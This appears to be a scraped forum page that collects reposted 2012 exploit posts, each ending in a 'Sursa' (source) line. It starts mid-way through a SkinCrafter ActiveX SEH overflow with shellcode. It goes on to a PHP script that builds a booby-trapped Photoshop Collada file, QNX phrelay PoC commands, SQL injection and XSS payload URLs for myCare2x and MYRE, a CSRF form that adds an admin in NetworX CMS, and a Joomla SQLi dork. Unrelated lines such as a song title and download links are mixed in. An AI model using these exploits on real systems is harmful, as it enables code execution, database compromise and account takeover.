unescape("%50%6c%70%43%30%57%70%55%50%6e%6b%32%48%35%6c%71") & _ unescape("%4f%67%41%6b%46%53%50%56%36%6b%39%48%78%4d%53%4f") & _ unescape("%30%71%6b%32%70%33%58%4c%30%4d%5a%56%64%43%6f%52") & _ unescape("%48%6a%38%4b%4e%4c%4a%66%6e%31%47%4b%4f%6b%57%61") & _ unescape("%73%70%61%30%6c%71%73%64%6e%70%65%73%48%72%45%35") & _ unescape("%50%68") arg1=String(1084, "A") nSeh=unescape("%eb%06%90%90") seh=unescape("%bb%44%06%10") nops=String(40,unescape("%90")) arg1=arg1+nSeh+seh+nops+shellcode arg1=arg1+String(10000, "D") arg2="defaultV" arg3="defaultV" arg4="defaultV" target.InitLicenKeys arg1 ,arg2 ,arg3 ,arg4 </script> Sursa: SkinCrafter ActiveX Control version 3.0 Buffer Overflow

QNX phrelay/phindows/phditto Multiple Vulnerabilities ####################################################################### Luigi Auriemma Application: QNX phrelay/phindows/phditto http://www.qnx.com http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.phindows/topic/coverpage.html http://www.qnx.com/developers/docs/6.4.1/neutrino/utilities/p/phrelay.html Versions: current Platforms: QNX Neutrino RTOS and Windows Bugs: A] bpe_decompress stack overflow B] Photon Session buffer overflow Exploitation: remote A] versus client and maybe server B] versus server Date: 10 May 2012 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== phrelay and phindows/phditto are based on a private protocol that allows to use the Photon graphical environment of the server (through the phrelay inetd program) on another machine (phindows, phditto and any other client). ####################################################################### ======= 2) Bugs ======= -------------------------------- A] bpe_decompress stack overflow -------------------------------- The BPE (byte pair encoding) compression uses two stack buffers of 256 bytes called "left" and "right". The bpe_decompress function used in all the client/server programs of this protocol is affected by a stack based buffer-overflow caused by the lack of checks on the data sequentially stored in these two buffers. --------------------------------- B] Photon Session buffer overflow --------------------------------- Buffer-overflow affecting phrelay in the handling of the device file specified by the client as existing Photon session. Note: considering that phrelay is not enabled by default and allows to connect without authentication directly to /dev/photon (the screen visible phisically on the machine) and phindows/phditto must be manually pointed to the malicious host for exploiting bug A, this advisory must be considered only a case study and nothing more. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip http://www.exploit-db.com/sploits/18864.zip A] at the moment I don't know how to call bpe_decompress on phrelay but I have verified that the bpe_decompress function is vulnerable at 100%. the following test works only on phindows/phditto (the proof-of-concept acts as a server): udpsz -C "a5 00 00 01 0000 ffff" -b A -l 0 -T -1 0 4868 1+7+0xffff B] udpsz -C "a5 10 00 00 0000 ffff 1400000008040100000000008002e0010000000000000000000000000000" -b A -T SERVER 4868 1+7+0xffff ####################################################################### ====== 4) Fix ====== No fix. ####################################################################### Sursa: QNX phrelay/phindows/phditto Multiple Vulnerabilities

Adobe Photoshop CS5.1 U3D.8BI Collada Asset Elements Stack Overflow <?php // ~ Adobe Photoshop CS5.1 U3D.8bi Library Collada Asset Elements // Unicode Conversion Stack Based Buffer Overflow poc (*.dae) // (32bit/SEH) ~ // // unicode overflow occurs when overlong asset elements are processed // one could be able to return inside an ASCII memory region // with an ultra large nop through assigning eip to ex. Photoshop.00630041. // the shellcode should be alphabetic (high bytes order filtering and various issues) // // Usage: php 9sg_dae.php // a file photoshop_sample.dae is created // start Photoshop then open it through the File menu // a message box pops, HEY! // // ~ rgod ~ - Advisory Reference: http://retrogod.altervista.org/9sg_photoshock_adv.htm /* you shuld change addresses according to your system then reencode with alpha2 (use eax alignment) //say "Hey" MsgBox Shellcode $code ="\x31\xc0\x31\xdb\x31\xc9\x31\xd2". "\xeb\x2a\x59". "\xbb\xca\x1d\xe4\x77". //LoadLibraryA(), kernel32.dll "\x51\xff\xd3\xeb\x2f\x59\x51\x50". "\xbb\x7a\x3d\xe6\x77". //GetProcAddress(), kernel32.dll "\xff\xd3\xeb". "\x34\x59\x31\xd2\x52\x51\x51\x52". "\xff\xd0\x31\xd2\x50". "\xb8\xf9\x68\xe6\x77". //ExitProcess(), kernel32.dll "\xff\xd0\xe8\xd1\xff\xff". "\xff\x75\x73\x65\x72\x33\x32\x2e". "\x64\x6c\x6c\x00\xe8\xcc\xff\xff". "\xff\x4d\x65\x73\x73\x61\x67\x65". "\x42\x6f\x78\x41\x00\xe8\xc7\xff". "\xff\xff\x48\x65\x79\x00"; */ $scode = "\x2d\x7d\x25\x5b\x7f". //sub preamble, align eax for alpha code,clean "\x2d\x79\x22\x20\x6f". //sub, align ... the gap is repaired through the inc eax trick "PYIIIIIIIIIIIIIIII7QZjA". "XP0A0AkAAQ2AB2BB0BBABXP". "8ABuJIvQYPp1IKp1YYtqJrZ". "K4jpYmk8JuMM4PwpQKOyCZK". "vORycaRpMksJUmkVqgyoKcz". "KvTRyTqZrRr0QrqPRkOn0VQ". "N20PnXzY0hZFpwYojpM8N1k". "OIokOQebSauPrP3trDnPdrL". "PlUPKXxLKOKOIorm1u2SRS3". "QQw0esrbOd8raC0KXKwkOYo". "KO3xSUt9uPA"; $eip="Ac"; //Photosho.00630041, return to our payload $payload = str_repeat("\x40",4096000);//inc eax, needed , also nop equivalent, don't touch $payload.=$scode; $payload.= str_repeat("\x40",1024000); $_xml ='<?xml version="1.0"?>'. '<COLLADA xmlns="http://www.collada.org/2005/11/COLLADASchema" version="1.4.1">'. ' <asset>'. ' <contributor>'. ' <author>rgod</author>'. ' <authoring_tool>Maya 8.0 | ColladaMaya v3.02 | FCollada v3.2</authoring_tool>'. ' <comments>Collada Maya Export Options: bakeTransforms=0;exportPolygonMeshes=1;bakeLighting=0;isSampling=0;'. ' curveConstrainSampling=0;exportCameraAsLookat=0;'. ' exportLights=1;exportCameras=1;exportJointsAndSkin=1;'. ' exportAnimations=1;exportTriangles=1;exportInvisibleNodes=0;'. ' exportNormals=1;exportTexCoords=1;exportVertexColors=1;exportTangents=0;'. ' exportTexTangents=0;exportConstraints=1;exportPhysics=0;exportXRefs=1;'. ' dereferenceXRefs=0;cameraXFov=0;'. str_repeat("A",170). 'cameraYFov=1;'. str_repeat("a",100). str_repeat("b",100). str_repeat("c",100). str_repeat("d",100). str_repeat("e",100). str_repeat("f",100). str_repeat("g",100). str_repeat("h",100). str_repeat("i",100). str_repeat("j",100). str_repeat("k",100). str_repeat("l",100). str_repeat("m",100). str_repeat("n",100). "aaaabbbA". $eip. "ccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyy". ' </comments>'. '<aaaa>'. $payload. '</aaaa>'. ' <copyright>'. ' Copyright 2012 rgod Computer Entertainment Inc.'. ' </copyright>'. ' <source_data>file:///C:/vs2005/sample_data/untitled</source_data>'. ' </contributor>'. ' <created>2008-04-24T22:29:59Z</created>'. ' <modified>2099-02-21T22:52:44Z</modified>'. ' <unit meter="0.01" name="centimeter"/>'. ' <up_axis>Y_UP</up_axis>'. ' </asset>'. '</COLLADA>'; file_put_contents("photoshop_sample.dae",$_xml); echo "done"; ?> Sursa: Adobe Photoshop CS5.1 U3D.8BI Collada Asset Elements Stack Overflow

Dean - Radmina (Produced by Delyno) - YouTube

myCare2x CMS Multiple Vulnerabilities Title: ====== myCare2x CMS - Multiple Web Vulnerabilities Date: ===== 2012-05-03 References: =========== http://www.vulnerability-lab.com/get_content.php?id=524 VL-ID: ===== 524 Introduction: ============= myCare2x is an web application. All program modules and data accesses are processed in the server. User only need a web browser, in order to use the myCare2x functions, so extensions or changes on the modules need no interferences at the clients. - Apache HTTPD Server - MySQL Database - PHP The spirit of Open Source also takes effect on implemented server software. myCare2x is based upon External linkApache as HTTP server and External linkMySQL as database management system. myCare2x is written in External linkPHP - an easy to learn and powerful scripting language. (Copy of the Vendor Homepage: http://mycare2x.net/en/solution ) Abstract: ========= The Vulnerability Laboratory Researcher Team discovered multiple web vulnerabilities in myCare v2x CMS. Report-Timeline: ================ 2012-05-03: Public or Non-Public Disclosure Status: ======== Published Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== 1.1 Multiple remote SQL Injection vulnerabilities are detected in myCare2x Content Management System. The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands on the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise. The vulnerability is located on the username post method. Vulnerable Module(s): [+] &aktion + &callurl [+] dept_nr [+] pid [+] Eintrag [+] name_last Picture(s): ../1.png ../2.png 1.2 Multiple persistent input validation vulnerabilities are detected in myCare2x Content Management System. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action. Vulnerable Module(s): [+] New Person - Insert new Person - Firstname, Lastname & Nickname [-] Index - Listing (index.php - Search Results - Name (middle) + Person Data Listing (right)) Picture(s): ../3.png ../4.png 1.3 Multiple non persistent cross site scripting vulnerabilities are detected in myCare2x Content Management System. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required user inter action or local low privileged user account. Successful exploitation can result in account steal, phishing & client-side content request manipulation. Vulnerable Module(s): [+] mycare_ward_print - Favorite [+] mycare2x_pat_info - Aktion [+] mycare2x_proc_search - LN [+] zusatzcode Picture(s): ../5.png ../6.png Proof of Concept: ================= 1.1 The SQL Injection vulnerabilities can be exploited by remote attacker without user inter action. For demonstration or reproduce ... PoC: http://127.0.0.1/modules/patient/mycare2x_pat_info.php?sid=moq09jafqbl4leasdpvcl7qi56?=-1%27&aktion=-1%27[SQL-Injection!] &callurl=-1%27[SQL-Injection!]&myPid=403 http://127.0.0.1/modules/importer/mycare2x_importer.php?sid=6dlskul290sc3dg2ab0mlpa0a3?=de&fid=800000101&pid=596&dept_nr=-1%27[SQL-Injection!] http://127.0.0.1/modules/importer/mycare2x_importer.php?sid=6dlskul290sc3dg2ab0mlpa0a3?=de&fid=800000101&pid=-1%27[SQL-Injection!]&dept_nr=11 http://127.0.0.1/modules/drg/mycare2x_proc_search.php?myAction=Suchen&myOpsEintrag=- 1%27[SQL-Injection!&val=&itemx=&mode=&sid=moq09jafqbl4ledgppvcl7qi56?=de&pn=100224&opnr=&ln=Gexxxn&fn=Brxo&bd=&dept_nr=&oprm=&display= &group_nr=&edit=1&icdtype=&y=&m=&d=&zusatzcode=&keyword=[SQL-Injection!] http://127.0.0.1/modules/patient/mycare_pid.php?pid=&ext_pid=&date_reg=&pat_type=Self&panel=1&title1=&title=&name_last=- 1%27[SQL-Injection!&name_first=&name_middle=&name_maiden=&name_others=&extern_access=&date_birth=&sex1=m&sex=m&civil_status1=& civil_status=&scitizenship=...&citizenship=&sreligion=...&religion=&sethnic_orig=..ðnic_orig=&addr_str=&addr_str_nr=&addr_zip= &addr_town=&addr_citytown=&addr_citytown_nr=&nat_id_nr=DE&country_state=&phone_1_code=&phone_1 _nr=&phone_2_code=&phone_2_nr=&cellphone_1_nr=&cellphone_2_nr=&fax=&email=&insurance_name=&insurance_instnr= &insurance_vknr=&insurance_nr=&insurance_state=&insurance_state1=&insurance_card_expire=&sid=moq09jafqbl4ledgppvcl7qi56?= en&myAction=&myFind=Find&myselectnr=&insurance_id=&nr=&edit=1&ref=&is_addon=&preselected_city=&i_acti ve=0&i_max=2&activ_tab_id=0&recognition=&smartcard=&smartcarddata= http://127.0.0.1/modules/patient/mycare_pid.php?pid=[SQL-Injection!] 1.2 The persistent input validation vulnerabilities can be exploited by remote attacker with low or medium required user inter action. For demonstration or reproduce ... Affected: index.php - Search Results - Name (middle) + Person Data Listing (right) Review: User/Person Listing <h2><img src="../../gui/img/common/default/ppd_case.gif">829: "><iframe src="a" onload='alert("VL")' <,="" "=""><iframe src=a onload=alert("VL") << URL: http://127.0.0.1/modules/patient/mycare_pid.php?pid=&ext_pid=&date_reg=2012-04-19+06%3A00%3A00&pat_type= Self&panel=1&title1=&title=&name_last=%22%3E %3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C&name_first=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+% 3C&name_middle=%22%3E%3Ciframe+src%3Da+onload %3Dalert%28%22VL%22%29+%3C&name_maiden=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+ %3C&name_others=&extern_access=&date_birth=&sex1=m&sex=m&civil_status1=&civil_status=&scitizenship=...&citizenship=&s religion=...&religion=&sethnic_orig=..ðnic_orig =&addr_str=&addr_str_nr=&addr_zip=&addr_town=&addr_citytown=&addr_citytown_nr=&nat_id_nr=DE&country_state=&phone_1_code= &phone_1_nr=&phone_2_code=&phone_2_nr=&cellphon e_1_nr=&cellphone_2_nr=&fax=&email=&insurance_name=&insurance_instnr=&insurance_vknr=&insurance_nr=&insurance_state=&insurance_state1= &insurance_card_expire=&sid=moq09 jafqbl4ledgppvcl7qi56?=en&myAction=Save&myFind=Find&myselectnr=&insurance_id=&nr=&edit=1&ref=&is_addon=&preselected_city= &i_active=0&i_max=2&activ_tab_id=0&recogni tion=&smartcard=&smartcarddata= 1.3 The client side cross site scripting vulnerabilities can be exploited by remote attacker with medium or high required user inter action. For demonstration or reproduce ... http://127.0.0.1/modules/nursing/mycare_ward_print.php?sid=moq09jafqbl4ledgppvcl7qi56?=de&favorites=[Cross Site Scripting!] http://127.0.0.1/modules/nursing/mycare_ward_print.php?sid=moq09jafqbl4ledgppvcl7qi56?=[Cross Site Scripting!]&favorites=[Cross Site Scripting!] http://127.0.0.1/modules/patient/mycare2x_pat_info.php?sid=moq09jafqbl4ledgppvcl7qi56?=de&aktion=[Cross Site Scripting!]&callurl=topwin&myPid=403 http://127.0.0.1/modules/patient/mycare2x_pat_info.php?sid=moq09jafqbl4ledgppvcl7qi56?=de&aktion=|PRI|AVE|FLB|&callurl=[Cross Site Scripting!]&myPid=403 http://127.0.0.1/modules/drg/mycare2x_proc_search.phpmyAction=Suchen&myOpsEintrag=1 &val=&itemx=&mode=&sid=moq09jafqbl4ledgppvcl7qi56?=de&pn=100224&opnr=&ln=[Cross Site Scripting!]&fn=Brxo&bd=&dept_nr=&oprm=&display=&group_nr=&edit=1&icdtype=&y=&m=&d=&zusatzcode=&keyword=2 Risk: ===== 1.1 The security risk of the remote sql injection vulnerabilities are estimated as critical. 1.2 The security risk of the persistent input validation vulnerabilities are estimated as medium(+). 1.3 The security risk of the client side cross site scripting vulnerabilities are estimated as low(+). Credits: ======== Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (storm () vulnerability-lab com) Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm () vulnerability-lab com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Domains: www.vulnerability-lab.com - www.vuln-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Contact: admin () vulnerability-lab com - support () vulnerability-lab com - irc.vulnerability-lab.com Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. Copyright © 2012 Vulnerability-Lab -- VULNERABILITY RESEARCH LABORATORY TEAM Website: www.vulnerability-lab.com Mail: research () vulnerability-lab com Sursa: myCare2x CMS Multiple Vulnerabilities

MYRE Real Estate Mobile 2012|2 Multiple Vulnerabilities Title: ====== MYRE Real Estate Mobile 2012|2 - Multiple Web Vulnerabilities Date: ===== 2012-05-01 References: =========== http://www.vulnerability-lab.com/get_content.php?id=516 VL-ID: ===== 516 Introduction: ============= Best solution for a professional Real Estate management software. Try MYRE Real Estate Mobile Software, Real Estate ready-to-use software best solution for a professional Real Estate management software. Try MYRE Real Estate Software, Real Estate ready-to-use software. At MYRE Real Estate Software, we offer professional solutions for your Real Estate business needs, including turn-key operations. That\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s right, turn-key! Start your real estate business today with MYRE Real Estate Mobile Software and get into the real estate market the same day. Businesses for sale Commercial properties for lease Commercial properties for sale Real estate properties for sale Real estate properties for rent Holiday rentals Or any combination MYRE Real Estate Software provides a complete realty listing management solution. It is easily customized to reflect your creativity whether you are starting from scratch or integrating it into an existing web site. MYRE Real Estate Software can be used to promote residential as well as commercial rentals. This software is suitable for an independent agent site, or the listings section of your brokerage and/or real estate agency web site. (Copy of the Vendor Homepage: http://www.myrephp.com & http://myrephp.com/realestate/1_mobile/ ) Abstract: ========= The Vulnerability Laboratory Researcher Team discovered multiple Vulnerabilities in MYREs Real Estate Mobile Application (2012 Q2). Report-Timeline: ================ 2012-05-01: Public or Non-Public Disclosure Status: ======== Published Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== 1.1 Multiple remote SQL Injection vulnerabilities are detected in MYREs Real Estate Mobile Application (2012 Q2). The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands on the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise. The vulnerability is located on the link_idd & userid value of the mobile application. Vulnerable Module(s): [+] Listings - Link_IDD [+] Agent Profile - UserID Picture(s): ../1.png ../2.png 1.2 Multiple non persistent cross site scripting vulnerabilities are detected in MYREs Real Estate Mobile Application (2012 Q2). The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required user inter action or local low privileged user account. Successful exploitation can result in account steal, phishing & client-side content request manipulation. Vulnerable Module(s): [+] Search - bedrooms1 [+] Search - price2 Picture(s): ../3.png ../4.png Proof of Concept: ================= 1.1 The SQL Injection vulnerabilities can be exploited by remote attacker without required user inter action. For demonstration or reproduce ... PoC: http://SITE/realestate/1_mobile/listings.php?link_idd=-13+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51--%20 http://SITE/realestate/1_mobile/agentprofile.php?userid=16+union+select[SQL-INJECTION!] 1.2 The client side cross site scripting vulnerabilities can be exploited by remote attacker with medium till high required user inter action. For demonstration or reproduce ... PoC: http://myrephp.com/realestate/1_mobile/search.php?cat_id1=1&city1=fu+&price2=%3E%22%3Ciframe+src %3Dwww.vulnerability-lab.com+onload%3Dalert%28%22VL%22%29+%3C&price1=%3E%22%3Ciframe+src%3Dwww.vulnerability-lab.com+ onload%3Dalert%28%22VL%22%29&bedrooms1=1%3E%22%3Ciframe+src%3Dwww.google.com+onload%3Dalert%28%22VL%22%29+ %3C&price1=%3E%22%3Ciframe+src%3Dwww.vulnerability-lab.com+onload%3Dalert%28%22VL%22%29&bathrooms1=0.5&order=link_id& sort=DESC&look=1&nolinks1=202- Risk: ===== 1.1 The security risk of the sql injection vulnerabilities are estimated as critical. 1.2 The security risk of the non persistent cross site scripting vulnerabilities are estimated as low(+). Credits: ======== Vulnerability Laboratory [Research Team] - Ibrahim M. El-Sayed (strom () vulnerability-lab com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012 Vulnerability-Lab -- VULNERABILITY RESEARCH LABORATORY TEAM Website: www.vulnerability-lab.com Mail: research () vulnerability-lab com Sursa: MYRE Real Estate Mobile 2012|2 Multiple Vulnerabilities

[FREE] RAPIDLEECH Rapidleech v2 rev. 41

http://www.avira.com/files/support/FAQ_KB_Download_Files/EN/AviraDNSRepairEN.exe

NetworX CMS - CSRF Add Admin # Exploit Title: NetworX CMS - CSRF Add Admin # Date: 15-April-2012 # Author: N3t.Crack3r # Software Link: http://www.socialabc.com/downloads/networx-social/ # Version: All Version # Category:: [Webapps] # Google dork: powered by networx # Tested on: [Ubuntu] # Demo site: http://www.socialabc.com/demo/ <!-- //================================================================================ ___ ___ __ _______ / | \_____ ____ | | ____ _ _\ _ \_______ _____ ______ / ~ \__ \ _/ ___\| |/ /\ \/ \/ / /_\ \_ __ \/ \ / ___/ \ Y // __ \\ \___| < \ /\ \_/ \ | \/ Y Y \\___ \ \___|_ /(____ /\___ >__|_ \ \/\_/ \_____ /__| |__|_| /____ > \/ \/ \/ \/ \/ \/ \/ Greets : Sho0ter , Net_spy , khanisgr8 , CROSS & All Hackw0rms Crew / Members ================================================================================ // Login info : Email : adm@hackw0rms.net pass:t00r # root@SecBoX:~# cat poc.php --> <html> <head> <script language="javascript"> function country_changed() { document.getElementById('hdnSubmited').value = 'change_country'; document.getElementById('frmMain').submit(); } </script> </head> <form action="http://<!----- REPLACE HEAR WITH URL ---->/admin/employer.php" form method="post" id="frmMain"> <input type="hidden" name="submited" value="save" id="hdnSubmited"> <br> <p class="text_14 bold" align="center">NetworX CSRF - Add Admin</p> <table cellpadding="5" border="0"> <tr> <td align="right" class="text_12">Email:</td> <td colspan="3"> <input type="text" name="UserEmail" value="adm@hackw0rms.net"> </td> </tr> <tr> <td align="right" class="text_12">Password:</td> <td colspan="3"> <input type="password" name="Password" value="t00r"> </td> </tr> <tr> <td align="right" class="text_12">First Name:</td> <td><input type="text" name="UserFirstname" value="Hack" class="t_box" style="width:150px;"></td> <td align="right" class="text_12">Last Name:</td> <td><input type="text" name="UserLastname" value="W0rm" class="t_box" style="width:150px;"></td> </tr> <tr> <td align="right" class="text_12">Country:</td> <td colspan="3"> <select name="UserCountry" onchange="country_changed()"> <option value="{ID}" {selected}>United state of Islam</option> </select> </td> </tr> <tr> <td align="right" class="text_12">Address:</td> <td colspan="3"> <input type="text" name="UserAddress1" value="69 1337 st" class="t_box" style="width:400px;"> </td> </tr> <tr> <td align="right" class="text_12">City / Town:</td> <td colspan="3"> <input type="text" name="UserCity" value="system32" class="t_box" style="width:200px;"> </td> </tr> <tr> <td align="right" class="text_12">State / Province:</td> <td> <select name="UserState" class="t_box" style="width:100px;"> <option value="{ID}" {selected}>LA</option> </select> </td> <td align="right" class="text_12">Zip Code:</td> <td><input type="text" name="UserZip" value="31337" class="t_box" style="width:100px;"></td> </tr> <tr> <td align="right" class="text_12">Contact Phone:</td> <td colspan="3"> <input type="text" name="UserPhone" value="691337" class="t_box" style="width:200px;"> </td> </tr> <tr> <td rowspan="10" valign="top" align="http://<!----- REPLACE HEAR WITH URL ---->/admin/employer.php" class="text_12">Permissions:</td> <td><input type="checkbox" name="UserPermissions[]" value="1" class="t_box" checked="checked" func_if_true({PermissionCustomers}, 'checked')> User Management Tool</td> </tr> <tr> <td><input type="checkbox" name="UserPermissions[]" value="2" class="t_box" checked="checked" func_if_true({PermissionContent}, 'checked')> Content Management Tool</td> </tr> <tr> <td><input type="checkbox" name="UserPermissions[]" value="4" class="t_box" checked="checked" func_if_true({PermissionStatistics}, 'checked')> Statistics and Reports</td> </tr> <tr> <td><input type="checkbox" name="UserPermissions[]" value="32" class="t_box" checked="checked" func_if_true({PermissionReports}, 'checked')> Complaint and Report Tool</td> </tr> </table> <br> <!-- buttons start --> <table width="100%" cellpadding="5" border="0"> <tr> <td width="80"> </td> <td align="right"> <input type="submit" name="Save" value="Save" style="width:80px;"> </td> </tr> </table> </form> </html> Sursa: NetworX CMS - CSRF Add Admin

joomla component (com_ponygallery) SQL injection Vulnerability ################################################## # Exploit Title: joomla component (com_ponygallery) SQL injection Vulnerability # Download : http://www.adyawinsa.com/index.php/remository?func=fileinfo&id=2 # Date: 11/04/2012 # Author: xDarkSton3x # E-mail : xdarkston3x@msn.com # Category: webapps # Google dork: inurl:"com_ponygallery" ################################################## [~]Exploit/p0c : http://www.site.com/index.php?option=com_ponygallery&Itemid=[sqli] Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] - [ Malandrines Team - DiosdelaRed - RemoteExecution ] [ Dedalo - Maztor ] Sursa: joomla component (com_ponygallery) SQL injection Vulnerability